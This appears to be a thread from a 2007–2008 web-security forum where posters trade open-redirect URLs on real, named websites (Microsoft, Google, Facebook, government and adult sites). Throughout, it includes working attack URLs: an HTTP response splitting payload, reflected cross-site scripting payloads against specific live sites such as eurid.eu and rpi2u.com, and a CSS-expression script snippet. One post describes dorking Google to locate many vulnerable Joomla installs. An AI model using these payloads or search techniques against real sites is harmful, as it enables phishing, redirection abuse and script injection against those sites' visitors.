http://profile.myspace.com/index.cfm?fuseaction=cms.goto&_u=http%3a%2f%2fwww.disney.com%2f

http://dw.com.com/redir?ltype=&siteid=45&edid=107&useract=51&destURL=http://www.google.com

http://www.hugeurl.com/?YTUzM2ViZGVkMWQ1YWFlYjdhNzkzM2RlNzBkZmM2ZTgmMTMmVm0wd2QyUXlVWGxWV0d4WFlUSm9WMVl3Wkc5V1ZsbDNXa2M1YWxKc1dqQlVWbHBQVjBaYWMySkVUbGhoTVVwVVZtcEdZV015U2tWVWJHaG9UV3N3ZUZacVFtRlRNazE1VTJ0V1ZXSkhhRzlVVm1oRFZWWmFkR1ZHV214U2JHdzFWa2QwYzJGc1NuUmhSemxWVmpOT00xcFZXbUZrUjA1R1pFWlNUbFpVVmtwV2JURXdZVEZrU0ZOclpHcFRSVXBZVkZWYWQxTkdVbFZTYlVacVZtdGFNRlZ0ZUZOVWJVWTJVbFJHVjFaRmIzZFdha1poVjBaT2NtSkdTbWxTTW1oWlYxZDRiMkl3TUhoWGJHUllZbFZhY2xWc1VrZFhiR3QzV2tSU1ZrMXJjRWxhU0hCSFZqSkZlVlZZWkZwV1JWcHlWVEJhVDJOc2NFaGpSbEpUVmxoQ1dsWnJXbGRoTVZWNVZXNU9hbEp0VWxsWmJGWmhZMVpzY2xkdFJteFdiVko1VmpJMWExWXdNVVZTYTFwV1lrWktSRlpxUVhoa1ZsWjFWMnhhYUdFeGNGbFhhMVpoVkRKT2RGTnJaRlJpVjNoWVZXcE9iMWRHV25STlNHUnNVakJzTkZVeWRHdGhWazVHVjJ4U1dtSkhhRlJXTVZwWFkxWktjbVJHVWxkaVJtOTNWMnhXYjJFeFdYZE5WVlpUWVRGd1dGbHJaRzlqYkZweFUydGFiRlpzV2xwWGExcHJZVWRGZUdOR2JGaGhNVnBvVmtSS1QyUkdTbkpoUjJoVFlYcFdlbGRYZUc5aU1XUkhWMjVTVGxKRlduSlVWbFp6VGxaYVdFNVZPV2hXYXpWSFZqSjRVMWR0U2toaFJsSlhUVVp3VkZacVJuZFNNVkowWlVkc1UySllZM2hXYTFwaFZURlZlRmR1U2s1V1ZscFVXV3RrVTFsV1VsWlhiVVpzWWtad2VGVXlkREJXTVZweVYyeHdXbFpXY0hKWlZXUkdaV3hHY21KR2FGaFRSVXBKVm10U1MxVXhXWGhYYmxaV1lsZG9WRmxyVm5kV1ZscDBaVWM1VWsxWFVsaFdNV2h2V1ZaS1JsTnRSbGRpV0U0MFZHdGFWbVZYVWtoa1JtUnBWbGhDTlZkVVFtRmpNV1IwVTJ0b2FGSnNTbGhVVlZwM1ZrWmFjVkp1WkZOV2ExcDVWREZrYzFVd01IbGhSbXhYWWxoQ1RGUnJXbEpsVmtweVdrWm9hV0Y2Vm5oV1ZFSnZVVEZzVjFWc1dsaGliVkp5V1d0YWQyVkdWblJrUkVKb1lYcEdlVlJzVm05WGJGcFhZMFJPV2xaWFVrZGFWM2hIWTJzeFYxcEdaRTVOUlhCS1ZtMTBVMU14VW5SV2EyUmhVMFphVmxsc1ZtRldSbEpZVGxjNVdGWnNjRmxaTUZVMVlWVXhXRlZyYUZkTmFsWlVWa2Q0VDFOR1ZuVlViRnBwVjBkb1dWWkdVa2RWTWsxNVVtdGFVRlp0VW5CV2JHaERUbFphU0dWSFJsWk5WbXcxVld4b2MxWnNXa1pUYkdoWFlXczFkbGxWV21GalZrcHpXa1pvVjJKclNrbFdWbVEwV1ZaWmVGTnJXbE5XUlZVNQ==

lol

http://www.google.com/searchhistory/url?url=http://sla.ckers.org

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 04/30/2007 09:06PM by tx.

http://free.grisoft.com/linkout.php?doc=5130&to=http://www.google.com Redirect
http://free.grisoft.com/linkout.php?doc=5130&to=http%3A%2F%2Fwww.google.com%0ALocation:javascript:%0A%0A%3Cscript%3Ealert(0)%3C/script%3E HTTP Response Splitting

Anyone knows if/where this Joomla! HTTP Response Splitting/Redirection is disclosed:

http://www.eurid.eu/index2.php?option=com_content&user_rating=1&submit_vote=%E8%A9%95%E4%BE%A1&task=vote&pop=0&Itemid=10&cid=1&url=%0AContent-Type:%20text/html%0AContent-Length:16%0A%0Ayou%20are%20so%20owned

(credited: bill)

Dorked Google (inurl:index2.php?option) and found many vulnerable sites. After a while Google popped-up a nice warning saying that "my query looks like automated request from a computer virus..." so I suppose this is old stuff.

@/nul: I haven't heard it before, it's still a valid issue on 1.0.10 (ouch, I was vulnerable), dunno about 1.0.12, yet. Of course eurid.eu is running a pretty outdated joomla install, seeing as how this works: http://www.eurid.eu/content/category/3/19/55%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E%3Cp%20id=%22/lang,en/

I'm betting there's some RFI on that site as well.

-tx @ lowtech-labs.org

http://www.imagelink.com.br/redir.asp?url=http://fr3dc3rv.blogspot.com
http://www.v-w-d.com/redir.asp?m=&target=http://fr3dc3rv.blogspot.com
http://www.alexandria.lib.va.us/link/redir.pxe?fr3dc3rv.blogspot.com
http://clicks.emarketmakers.com/ExpiredOffer.aspx?redirectUrl=http://fr3dc3rv.blogspot.com
http://mineco.fgov.be/redir.asp?loc=http://fr3dc3rv.blogspot.com
http://www.nhlbi.nih.gov/cgi-bin/redir.pl?url=http://fr3dc3rv.blogspot.com

-------------------------------
http://fr3dc3rv.blogspot.com



Edited 1 time(s). Last edit at 05/09/2007 08:50AM by FR3DC3RV.

born for porn

http://empornium.us/redir.php?url=http://www.google.com



Edited 2 time(s). Last edit at 05/08/2007 04:47PM by .mario.

http://www.microsoft.com/windows2000/SelectBox-redir.aspx?s=http://www.google.com/

http://adlog.com.com/adlog/x/t=0/http://www.google.com where 'x' is any character

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 05/11/2007 01:17AM by tx.

posted in FD, but I thought it was interesting: http://www.google.com/url?q=http://whmt.blogspot.com/&sa=D&sntz=1&usg=1%27 (redirects to the original blog post)

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 08/13/2007 09:51PM by tx.

http://www.analogx.com/cgi-bin/cgirdir.exe?http://google.com/

http://www.facebook.com/search_redirect.php?u=http%3A%2F%2Fgoogle.com user must be logged in

-tx @ lowtech-labs.org

http://www.ahsay.com/awstats/awredir.pl?url=http://google.com

I contacted RBC about this 2 weeks ago. Not a redirect, but opens in a new frame. Could be used as a phish


[www2.rbccm.com]

porn site redirects

http://www.pichunter.com/o.php?h=http://google.com
http://www.madthumbs.com/cgi-bin/atx/out.cgi?id=39&trade=http://google.com
http://www.freegonzo.com/out.php?urls=http://google.com

http://washington.gov/exit.aspx?url=www.google.nl

http://www.lexisnexis.com/search/Results1.asp?redirect&s=1&target=http%3A%2F%2Fwww.google.com

-tx @ lowtech-labs.org

http://news.google.com/news/url?sa=t&ct=au/19-0&fp=46f30982c5d4752c&ei=ID7zRu-0HIzQqgOUsNDpAw&url=http%3A//sla.ckers.org&sig2=xnaVXpfaSO3NQ7bX5bpqWg


:)

http://www.rpi2u.com/message.asp?message=somewhereHere..



Edited 1 time(s). Last edit at 09/24/2007 11:39PM by krazl.

lol

krazl Wrote:
-------------------------------------------------------
> http://www.rpi2u.com/message.asp?message=somewhere
> Here..

That is not a redirect. It is a XSS hole http://www.rpi2u.com/message.asp?message=<script>alert(1)</script> though, which you could post in the other "So it begins..." forum.

http://images.google.nl/local_url?q=http://sla.ckers.org
http://maps.google.nl/local_url?q=http://sla.ckers.org

Might work on more sub-domains.

both work on other tld's too like .com, .fi, etc

friendster..
<div id="mylousycode" expr="window.location('http://www.google.com')" style="background:url('javascript:eval(document.all.mylousycode.expr)')"></div>



Edited 1 time(s). Last edit at 12/13/2007 11:39PM by krazl.

Better Business Bureau

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

http://www.becks.de/iframes/becksit.php?url=http://sla.ckers.org
http://www.becksbeer.com/lda.aspx?ReturnUrl=http://sla.ckers.org
...

http://dev.mysql.com/get/anyQueryString/from/http://asdf.com/

anyQueryString is modifiable, as is asdf.com/

-maluc

http://www.globalsecurity.org/cgi-bin/texis.cgi/webinator/search/redir.html?u=http%3A//sla.ckers.org

EDIT: This appears to affect all versions of Thunderstone's Webinator software: http://search.thunderstone.com/texis/redir/main.bin?q=&u=http://www.google.com

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 02/11/2008 04:20PM by tx.